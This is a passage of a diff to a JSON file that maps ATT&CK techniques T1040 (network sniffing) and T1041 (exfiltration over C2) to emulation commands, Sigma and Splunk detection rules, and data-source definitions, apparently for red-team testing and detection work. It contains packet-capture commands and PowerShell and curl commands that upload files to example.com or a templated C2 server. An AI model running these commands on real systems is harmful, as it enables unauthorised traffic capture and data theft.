$env:temp\\wireshark_installer.exe /S\n" + }, + { + "description": "npcap must be installed.\n", + "prereq_command": "if (test-path \"#{npcap_path}\") {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest -OutFile $env:temp\\npcap_installer.exe #{npcap_url}\nStart-Process $env:temp\\npcap_installer.exe\n" + } + ], + "executor": { + "command": "\"c:\\Program Files\\Wireshark\\tshark.exe\" -i #{interface} -c 5\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows Internal Packet Capture", + "auto_generated_guid": "b5656f67-d67f-4de8-8e62-b5581630f528", + "description": "Uses the built-in Windows packet capture\nAfter execution you should find a file named trace.etl and trace.cab in the temp directory", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "netsh trace start capture=yes tracefile=%temp%\\trace.etl maxsize=10", + "cleanup_command": "netsh trace stop >nul 2>&1\nTIMEOUT /T 5 >nul 2>&1\ndel %temp%\\trace.etl >nul 2>&1\ndel %temp%\\trace.cab >nul 2>&1", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows Internal pktmon capture", + "auto_generated_guid": "c67ba807-f48b-446e-b955-e4928cd1bf91", + "description": "Will start a packet capture and store log file as t1040.etl.\nhttps://lolbas-project.github.io/lolbas/Binaries/Pktmon/", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "pktmon.exe start --etw -f %TEMP%\\t1040.etl\nTIMEOUT /T 5 >nul 2>&1\npktmon.exe stop\n", + "cleanup_command": "del %TEMP%\\t1040.etl", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows Internal pktmon set filter", + "auto_generated_guid": "855fb8b4-b8ab-4785-ae77-09f5df7bff55", + "description": "Select Desired ports for packet capture \nhttps://lolbas-project.github.io/lolbas/Binaries/Pktmon/", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "pktmon.exe filter add -p 445\n", + 
"cleanup_command": "pktmon filter remove", + "name": "command_prompt", + "elevation_required": true + } + } + ] + }, + { + "id": "1b4fb81c-8090-426c-93ab-0a633e7a16a7", + "name": "Sniff network traffic", + "description": "Perform a packet capture", + "tactic": "credential-access", + "technique": { + "attack_id": "T1040", + "name": "Network Sniffing" + }, + "privilege": "Elevated", + "platforms": { + "windows": { + "psh": { + "timeout": 80, + "command": "$path = \"$ENV:UserProfile\\Desktop\\pcap.etl\";\nNew-NetEventSession -Name \"PCAP\" -CaptureMode SaveToFile -LocalFilePath $path;\nAdd-NetEventProvider -Name \"Microsoft-Windows-TCPIP\" -SessionName \"PCAP\";\nStart-NetEventSession -Name \"PCAP\";\nStart-Sleep -s 60;\nStop-NetEventSession -Name \"PCAP\";\nif (Test-Path $path) {\n echo $path;\n exit 0;\n} else {\n echo \"Failed to generate PCAP file.\";\n exit 1;\n};\n", + "cleanup": "Remove-NetEventSession -Name \"PCAP\";\nRemove-Item $ENV:UserProfile\\Desktop\\pcap.etl;\n" + } + }, + "darwin": { + "sh": { + "command": "tcpdump -i en0 & sleep 5; kill $!\n" + } + } + } + }, + { + "Empire Module": "powershell/collection/packet_capture", + "ATT&CK Technique #1": "T1040", + "ATT&CK Technique #2": "", + "Technique": "Network Sniffing", + "Concatenate for Python Dictionary": "\"powershell/collection/packet_capture\": [\"T1040\"]," + }, + { + "Empire Module": "python/collection/linux/sniffer", + "ATT&CK Technique #1": "T1040", + "ATT&CK Technique #2": "", + "Technique": "Network Sniffing", + "Concatenate for Python Dictionary": "\"python/collection/linux/sniffer\": [\"T1040\"]," + }, + { + "Empire Module": "python/collection/osx/sniffer", + "ATT&CK Technique #1": "T1040", + "ATT&CK Technique #2": "", + "Technique": "Network Sniffing", + "Concatenate for Python Dictionary": "\"python/collection/osx/sniffer\": [\"T1040\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"tshark.exe\"or 
process_path contains \"windump.exe\"or process_path contains \"logman.exe\"or process_path contains \"tcpdump.exe\"or process_path contains \"wprui.exe\"or process_path contains \"wpr.exe\")", + "name": "Network Sniffing" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=syslog entered promiscuous mode | table host,message", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=syslog left promiscuous mode | table host,message", + "name": "" + } + ], + "possible_detections": [ + "/var/log/messages", + { + "title": "Network Sniffing", + "id": "f4d3748a-65d1-4806-bd23-e25728081d01", + "status": "experimental", + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.yaml" + ], + "logsource": { + "product": "linux", + "service": "auditd" + }, + "detection": { + "selection1": { + "type": "execve", + "a0": "tcpdump", + "a1": "-c", + "a3|contains": "-i" + }, + "selection2": { + "type": "execve", + "a0": "tshark", + "a1": "-c", + "a3": "-i" + }, + "condition": "selection1 or selection2" + }, + "falsepositives": [ + "Legitimate administrator or user uses network sniffing tool for legitimate reason" + ], + "level": "low", + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ] + }, + { + "title": "Capture a Network Trace with netsh.exe", + "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", + "status": "experimental", + "description": "Detects capture a network trace via netsh.exe trace functionality", + "references": [ + 
"https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/" + ], + "author": "Kutepov Anton, oscd.community", + "date": "2019/10/24", + "tags": [ + "attack.discovery", + "attack.t1040" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine|contains|all": [ + "netsh", + "trace", + "start" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason" + ], + "level": "medium" + }, + { + "title": "Network Sniffing", + "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "status": "experimental", + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.yaml" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": [ + { + "Image|endswith": "\\tshark.exe", + "CommandLine|contains": "-i" + }, + { + "Image|endswith": "\\windump.exe" + } + ], + "condition": "selection" + }, + "falsepositives": [ + "Admin activity" + ], + "fields": [ + "Image", + "CommandLine", + "User", + "LogonGuid", + "Hashes", + "ParentProcessGuid", + "ParentCommandLine" + ], + "level": "low", + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ] + }, + [ + "Network device logs" + ], + [ + "Host network interface" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network device logs" + ], + [ + 
"Host network interface" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + 
"definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1041", + "command_list": [ + "if(-not (Test-Path #{filepath})){ \n 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value \"This is line $_.\" }\n}\n[System.Net.ServicePointManager]::Expect100Continue = $false\n$filecontent = Get-Content -Path #{filepath}\nInvoke-WebRequest -Uri example.com -Method POST -Body $filecontent -DisableKeepAlive\n", + "if(-not (Test-Path $env:TEMP\\LineNumbers.txt)){ \n 1..100 | ForEach-Object { Add-Content -Path $env:TEMP\\LineNumbers.txt -Value \"This is line $_.\" }\n}\n[System.Net.ServicePointManager]::Expect100Continue = $false\n$filecontent = Get-Content -Path $env:TEMP\\LineNumbers.txt\nInvoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive\n", + "curl -F \"data=@#{host.dir.compress}\" --header 
\"X-Request-ID: `hostname`-#{paw}\" #{server}/file/upload\n", + "$ErrorActionPreference = 'Stop';\n$fieldName = \"#{host.dir.compress}\";\n$filePath = \"#{host.dir.compress}\";\n$url = \"#{server}/file/upload\";\n\nAdd-Type -AssemblyName 'System.Net.Http';\n\n$client = New-Object System.Net.Http.HttpClient;\n$content = New-Object System.Net.Http.MultipartFormDataContent;\n$fileStream = [System.IO.File]::OpenRead($filePath);\n$fileName = [System.IO.Path]::GetFileName($filePath);\n$fileContent = New-Object System.Net.Http.StreamContent($fileStream);\n$content.Add($fileContent, $fieldName, $fileName);\n$client.DefaultRequestHeaders.Add(\"X-Request-Id\", $env:COMPUTERNAME + '-#{paw}');\n$client.DefaultRequestHeaders.Add(\"User-Agent\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\");\n\n$result = $client.PostAsync($url, $content).Result;\n$result.EnsureSuccessStatusCode();\n" + ], + "commands": [ + { + "command": "if(-not (Test-Path #{filepath})){ \n 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value \"This is line $_.\" }\n}\n[System.Net.ServicePointManager]::Expect100Continue = $false\n$filecontent = Get-Content -Path #{filepath}\nInvoke-WebRequest -Uri example.com -Method POST -Body $filecontent -DisableKeepAlive\n", + "source": "atomics/T1041/T1041.yaml", + "name": "Atomic Red Team Test - Exfiltration Over C2 Channel" + }, + { + "command": "if(-not (Test-Path $env:TEMP\\LineNumbers.txt)){ \n 1..100 | ForEach-Object { Add-Content -Path $env:TEMP\\LineNumbers.txt -Value \"This is line $_.\" }\n}\n[System.Net.ServicePointManager]::Expect100Continue = $false\n$filecontent = Get-Content -Path $env:TEMP\\LineNumbers.txt\nInvoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive\n", + "source": "atomics/T1041/T1041.yaml", + "name": "Atomic Red Team Test - Exfiltration Over C2 Channel" + }, + { + "command": "curl -F \"data=@#{host.dir.compress}\" --header 
\"X-Request-ID: `hostname`-#{paw}\" #{server}/file/upload\n", + "source": "data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml", + "name": "Exfil the staged directory" + }, + { + "command": "$ErrorActionPreference = 'Stop';\n$fieldName = \"#{host.dir.compress}\";\n$filePath = \"#{host.dir.compress}\";\n$url = \"#{server}/file/upload\";\n\nAdd-Type -AssemblyName 'System.Net.Http';\n\n$client = New-Object System.Net.Http.HttpClient;\n$content = New-Object System.Net.Http.MultipartFormDataContent;\n$fileStream = [System.IO.File]::OpenRead($filePath);\n$fileName = [System.IO.Path]::GetFileName($filePath);\n$fileContent = New-Object System.Net.Http.StreamContent($fileStream);\n$content.Add($fileContent, $fieldName, $fileName);\n$client.DefaultRequestHeaders.Add(\"X-Request-Id\", $env:COMPUTERNAME + '-#{paw}');\n$client.DefaultRequestHeaders.Add(\"User-Agent\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\");\n\n$result = $client.PostAsync($url, $content).Result;\n$result.EnsureSuccessStatusCode();\n", + "source": "data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml", + "name": "Exfil the staged directory" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1041", + "display_name": "Exfiltration Over C2 Channel", + "atomic_tests": [ + { + "name": "C2 Data Exfiltration", + "auto_generated_guid": "d1253f6e-c29b-49dc-b466-2147a6191932", + "description": "Exfiltrates a file present on the victim machine to the C2 server.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "destination_url": { + "description": "Destination URL to post encoded data.", + "type": "String", + "default": "example.com" + }, + "filepath": { + "description": "The file which is being exfiltrated to the C2 Server.", + "type": "Path", + "default": "$env:TEMP\\LineNumbers.txt" + } + }, + "executor": { + "command": "if(-not (Test-Path #{filepath})){ \n 1..100 | 
ForEach-Object { Add-Content -Path #{filepath} -Value \"This is line $_.\" }\n}\n[System.Net.ServicePointManager]::Expect100Continue = $false\n$filecontent = Get-Content -Path #{filepath}\nInvoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive\n", + "name": "powershell" + } + } + ] + }, + { + "id": "ea713bc4-63f0-491c-9a6f-0b01d560b87e", + "name": "Exfil staged directory", + "description": "Exfil the staged directory", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1041", + "name": "Exfiltration Over C2 Channel" + }, + "platforms": { + "darwin": { + "sh": { + "command": "curl -F \"data=@#{host.dir.compress}\" --header \"X-Request-ID: `hostname`-#{paw}\" #{server}/file/upload\n" + } + }, + "linux": { + "sh": { + "command": "curl -F \"data=@#{host.dir.compress}\" --header \"X-Request-ID: `hostname`-#{paw}\" #{server}/file/upload\n" + } + }, + "windows": { + "psh,pwsh": { + "command": "$ErrorActionPreference = 'Stop';\n$fieldName = \"#{host.dir.compress}\";\n$filePath = \"#{host.dir.compress}\";\n$url = \"#{server}/file/upload\";\n\nAdd-Type -AssemblyName 'System.Net.Http';\n\n$client = New-Object System.Net.Http.HttpClient;\n$content = New-Object System.Net.Http.MultipartFormDataContent;\n$fileStream = [System.IO.File]::OpenRead($filePath);\n$fileName = [System.IO.Path]::GetFileName($filePath);\n$fileContent = New-Object System.Net.Http.StreamContent($fileStream);\n$content.Add($fileContent, $fieldName, $fileName);\n$client.DefaultRequestHeaders.Add(\"X-Request-Id\", $env:COMPUTERNAME + '-#{paw}');\n$client.DefaultRequestHeaders.Add(\"User-Agent\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\");\n\n$result = $client.PostAsync($url, $content).Result;\n$result.EnsureSuccessStatusCode();\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + } + ], + 
"queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "LMD - SRUM" + ], + [ + "User interface" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "LOG-MD", + "SRUM Netflow - Win 8 & 10" + ], + [ + "User interface" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
